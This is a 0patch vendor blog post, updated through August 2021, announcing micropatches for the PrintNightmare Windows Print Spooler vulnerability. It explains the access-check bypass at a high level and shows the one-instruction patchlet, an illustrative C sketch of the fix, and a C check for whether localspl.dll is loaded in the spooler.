Free Micropatches for PrintNightmare Vulnerability (CVE-2021-34527)

2 July 2021 at 13:34


by Mitja Kolsek, the 0patch Team


Update 8/11/2021: August 2021 Windows Updates brought a fix for PrintNightmare that has the same default effect as our micropatch, although with a different implementation; therefore our micropatch is no longer free but available with a 0patch PRO license.

Update 7/16/2021: We've ported and issued our PrintNightmare patches for Windows computers that have July 2021 Windows Updates installed (which we do recommend). Our patches prevent exploitation of PrintNightmare even if computer settings render Microsoft's patch ineffective, as described by Will Dormann's diagram. These patches remain free for now.

Update 7/15/2021: July Patch Tuesday patches included the same PrintNightmare fix as the July 6 out-of-band Windows Update, with Microsoft stating that it properly resolves the vulnerability. As this diagram shows, two configuration options that aren't inherently security-related can make the system vulnerable to at least local - but likely also remote - attack, so we're going to port our patches to at least July Windows Updates while we continue to assess the situation. Since July Windows Updates also brought fixes for various other vulnerabilities, we recommend applying them to keep your computers fully up-to-date.

Update 7/7/2021: Microsoft has issued an out-of-band update for the PrintNightmare vulnerability, but the next day this update was found to be ineffective for both local and remote attack vectors. The update does, however, modify localspl.dll on the computer, which means that our existing patches stop getting applied to this module if the update is installed. In other words, if you used 0patch to protect your computers against PrintNightmare, applying the July 6 update from Microsoft makes you vulnerable again. Since we expect Microsoft to issue another modification to localspl.dll next week on Patch Tuesday, we decided not to port our patches to the July 6 version of localspl.dll but rather wait and see what happens next week. Consequently, we recommend NOT INSTALLING the July 6 Windows update if you're using 0patch.

Update 7/5/2021: Security researcher cube0x0 discovered another attack vector for this vulnerability, which significantly expands the set of affected machines. While the original attack vector was Print System Remote Protocol [MS-RPRN], the same attack delivered via Print System Asynchronous Remote Protocol [MS-PAR] does not require Windows server to be a domain controller, or Windows 10 machine to have UAC User Account Control disabled or PointAndPrint NoWarningNoElevationOnInstall enabled. Note that our patches for Servers 2019, 2016, 2012 R2 and 2008 R2 issued on 7/2/2021 are effective against this new attack vector and don't need to be updated.


Introduction

June 2021 Windows Updates brought a fix for a vulnerability CVE-2021-1675 originally titled "Windows Print Spooler Local Code Execution Vulnerability". As usual, Microsoft's advisory provided very little information about the vulnerability, and very few probably noticed that about two weeks later, the advisory was updated to change "Local Code Execution" to "Remote Code Execution".

This CVE ID would probably remain one of the boring ones without a surprise publication of a proof-of-concept for a remote code execution vulnerability called PrintNightmare, indicating that it was  CVE-2021-1675. Security researchers Zhiniang Peng and Xuefeng Li, who published this POC, believed that their vulnerability was already fixed by Microsoft, and saw other researchers slowly leaking details, so they decided to publish their work as well.

It turned out that PrintNightmare was not, in fact, CVE-2021-1675 - and the published details and POC were for a yet unpatched vulnerability that turned out to allow remote code execution on all Windows Servers from version 2019 back to at least version 2008, especially if they were configured as domain controllers.

The security community went scrambling to clear the confusion, identify conditions for exploitability, and find workarounds in absence of an official fix from Microsoft. Meanwhile, PrintNightmare started getting actively exploited, Microsoft has confirmed it to be a separate vulnerability to CVE-2021-1675, assigned it CVE-2021-34527, and recommended that affected users either disable the Print Spooler service or disable inbound remote printing.

In addition to Microsoft's recommendations, workarounds gathered from the community included removing Authenticated Users from the "Pre-Windows 2000 Compatible Access" group, and setting permissions on print spooler folders to prevent the attack.

All these mitigations can have unwanted and unexpected side effects that can break functionality in production (1, 2, 3), including some unrelated to printing.


Patching the Nightmare

 

Long story short, our team at 0patch has analyzed the vulnerability and created micropatches for different affected Windows versions, starting with those most critical and most widely used:


  1. Windows Server 2019 (updated with June 2021 Updates)
  2. Windows Server 2016 (updated with June 2021 Updates)
  3. Windows Server 2012 R2 (updated with June 2021 Updates)
  4. Windows Server 2008 R2 (updated with January 2020 Updates, no Extended Security Updates) 
  5. Windows 10 v21H1 (updated with June 2021 Updates)
  6. Windows 10 v20H2 (updated with June 2021 Updates)
  7. Windows 10 v2004 (updated with June 2021 Updates) 
  8. Windows 10 v1909 (updated with June 2021 Updates) 
  9. Windows 10 v1903 (updated with December 2020 Updates - latest before end of support)
  10. Windows 10 v1809 (updated with May 2021 Updates - latest before end of support)
  11. Windows 10 v1803 (updated with May 2021 Updates - latest before end of support)
  12. Windows 10 v1709 (updated with October 2020 Updates - latest before end of support)
  13. Windows 7 (updated with January 2020 Updates, no Extended Security Updates) 

 

[Note: Additional patches will be released as needed based on exploitability on different Windows platforms.]

Our micropatches prevent the APD_INSTALL_WARNED_DRIVER flag in dwFileCopyFlags of function AddPrinterDriverEx from bypassing the object access check, which allowed the attack to succeed. We believe that "install warned drivers" functionality is not a very often used one, and breaking it in exchange for securing Windows machines from trivial remote exploitation is a good trade-off.

Our PrintNightmare patch only contains one single instruction, setting the rbx register to 1 and thus forcing the execution towards the code block that performs said object access check.



MODULE_PATH "..\Affected_Modules\localspl.dll_10.0.19041.1052_64bit_Win10-20H2-u202106\localspl.dll"
PATCH_ID 622
PATCH_FORMAT_VER 2
VULN_ID 7153
PLATFORM win64

patchlet_start
    PATCHLET_ID 1
    PATCHLET_TYPE 2
    PATCHLET_OFFSET 0x8f5da
    N_ORIGINALBYTES 5
    JUMPOVERBYTES 8
    
    code_start
        mov ebx, 1       
    code_end
patchlet_end

   


Or, as seen in IDA Pro (the green code block is injected by 0patch; the grey block is the original code that had to be moved so that a jmp instruction to the patch could be placed there).
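For readers who can't see the screenshot, the effect of the patch can be approximated in C. The sketch below uses our own names (none of them are symbols from localspl.dll) and compresses the real code considerably, but it captures the decision that the single patched instruction changes:

#include <windows.h>
#include <winspool.h>

#ifndef APD_INSTALL_WARNED_DRIVER
#define APD_INSTALL_WARNED_DRIVER 0x00008000
#endif

// Stub standing in for the spooler's object access check; illustrative only.
static BOOL CheckPrinterObjectAccess(void)
{
    return FALSE;   // pretend the caller lacks the required rights
}

// Approximate view of the decision the micropatch changes. All names are ours,
// not symbols from localspl.dll, and the real code is considerably more involved.
static BOOL HandleAddDriverRequest(DWORD dwFileCopyFlags)
{
    // Original logic: the "install warned driver" flag could skip the access check.
    BOOL performAccessCheck = !(dwFileCopyFlags & APD_INSTALL_WARNED_DRIVER);

    performAccessCheck = TRUE;   // effect of the micropatch ("mov ebx, 1")

    if (performAccessCheck && !CheckPrinterObjectAccess())
        return FALSE;            // access denied - the driver is not installed

    return TRUE;                 // driver installation would proceed from here
}

int wmain(void)
{
    return HandleAddDriverRequest(APD_COPY_ALL_FILES | APD_INSTALL_WARNED_DRIVER) ? 1 : 0;
}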



 

See our micropatch in action:



Micropatches for PrintNightmare will be free until Microsoft has issued an official fix. If you want to use them, create a free account at 0patch Central, then install and register 0patch Agent from 0patch.com. Everything else will happen automatically. No computer reboots will be needed.

Compatibility note: Some Windows 10 and Server systems exhibit occasional timeouts in the Software Protection Platform Service (sppsvc.exe) while running 0patch Agent. This looks like a bug in the Windows Code Integrity mitigation, which prevents a 0patch component from being injected into the service (which is expected) but sometimes also performs a lot of seemingly pointless processing that causes process startup to time out. As a result, various licensing-related errors can occur. Should the issue occur, it can be resolved by excluding sppsvc.exe from 0patch injection as described in this article.


Frequently Asked Questions


Q: Which Windows versions are affected by PrintNightmare?

Answer updated 7/15/2021: We believe Will Dormann's PrintNightmare diagram most accurately describes the conditions under which PrintNightmare is exploitable, and this applies to all Windows versions at least back to Windows 7 and Server 2008 R2.

We previously thought that domain-joined computers were not vulnerable, but this was likely because joining a domain set up firewall rules that blocked remote exploitation until a folder or printer was shared.

 

Q: How about Windows systems without June 2021 Windows Updates?

We believe that without June 2021 Windows Updates, all supported Windows systems, i.e., all servers from 2008 R2 up and all workstations from Windows 7 and up, are affected.


Q: What will happen with these micropatches when Microsoft issues their own fix for PrintNightmare?

[Update 7/15/2021: We recommend that everyone continue applying regular Windows Updates, including specifically the July Patch Tuesday update.]

First off, as a rule we absolutely recommend that you install all available security updates from the original vendors [Update 7/8/2021: For the first time ever we do NOT recommend installing the July 6 update if you're using 0patch. See the top of the article for more information]. When Microsoft fixes PrintNightmare, their update will almost certainly replace localspl.dll, where the vulnerability resides and where our micropatches are being applied. Applying the update will therefore change the cryptographic hash of this file, and 0patch will stop applying our micropatches to it. You won't have to do anything in 0patch (such as disabling a micropatch); this will all happen automatically by 0patch design.

When the official fix is available, our micropatches will stop being free and will fall under the 0patch PRO license. This means that if you wish to continue using them (along with many other micropatches that the PRO license includes), you will have to purchase the appropriate number of licenses.

[Update 7/8/2021: We do not consider Microsoft's July 6 out-of-band updates to be a proper fix, so we're keeping our PrintNightmare patches free until they issue a correct fix.]


Q: I have installed 0patch but the PrintNightmare patch is not applied. Why?

The Print Spooler service doesn't load localspl.dll immediately when it starts, so the library is probably just not loaded yet. When it is needed (e.g., when installing a new printer, probably also when printing, and certainly when a PrintNightmare proof-of-concept or exploit is launched against the service), localspl.dll gets loaded and patched by 0patch.
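If you'd like to verify this, you can check whether the spooler process currently has localspl.dll mapped. Below is a minimal sketch using the Toolhelp API; it needs to run elevated, the spooler process name spoolsv.exe is the standard one, and everything else is ours:

#include <windows.h>
#include <tlhelp32.h>
#include <wchar.h>
#include <stdio.h>

// Returns the PID of the first process whose image name matches 'name', or 0 if not found.
static DWORD FindProcess(const wchar_t *name)
{
    DWORD pid = 0;
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap == INVALID_HANDLE_VALUE) return 0;
    PROCESSENTRY32W pe = { sizeof(pe) };
    for (BOOL ok = Process32FirstW(snap, &pe); ok; ok = Process32NextW(snap, &pe)) {
        if (_wcsicmp(pe.szExeFile, name) == 0) { pid = pe.th32ProcessID; break; }
    }
    CloseHandle(snap);
    return pid;
}

int wmain(void)
{
    DWORD pid = FindProcess(L"spoolsv.exe");
    if (!pid) { wprintf(L"Print Spooler is not running\n"); return 1; }

    // Enumerate modules loaded in the spooler process (requires elevation).
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pid);
    if (snap == INVALID_HANDLE_VALUE) { wprintf(L"Cannot snapshot spoolsv.exe\n"); return 1; }

    BOOL found = FALSE;
    MODULEENTRY32W me = { sizeof(me) };
    for (BOOL ok = Module32FirstW(snap, &me); ok; ok = Module32NextW(snap, &me)) {
        if (_wcsicmp(me.szModule, L"localspl.dll") == 0) { found = TRUE; break; }
    }
    CloseHandle(snap);

    wprintf(found ? L"localspl.dll is loaded - the patch can be applied to it\n"
                  : L"localspl.dll is not loaded yet\n");
    return 0;
}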

To be sure you have the correct version of localspl.dll, launch 0patch Console and open the PATCHES -> RELEVANT PATCHES tab. At least one PrintNightmare patch should be listed there.


Q: We have a lot of affected computers. How can we prepare for the next Windows 0day?

Obviously, deploying 0patch in an enterprise production environment on a Friday afternoon is not something most organizations would find optimal. As with any enterprise software, we recommend testing 0patch alongside your existing software on a group of test computers before deploying it across your network. Please contact [email protected] to set up a trial, and when the next 0day like this comes out, you'll be ready to just flip a switch in 0patch Central and go home for the weekend.


Credits

We'd like to thank Will Dormann of CERT/CC for behind-the-scenes technical discussion that helped us understand the issue and decide on the best way to patch it.


Please revisit this blog post for updates or follow 0patch on Twitter.
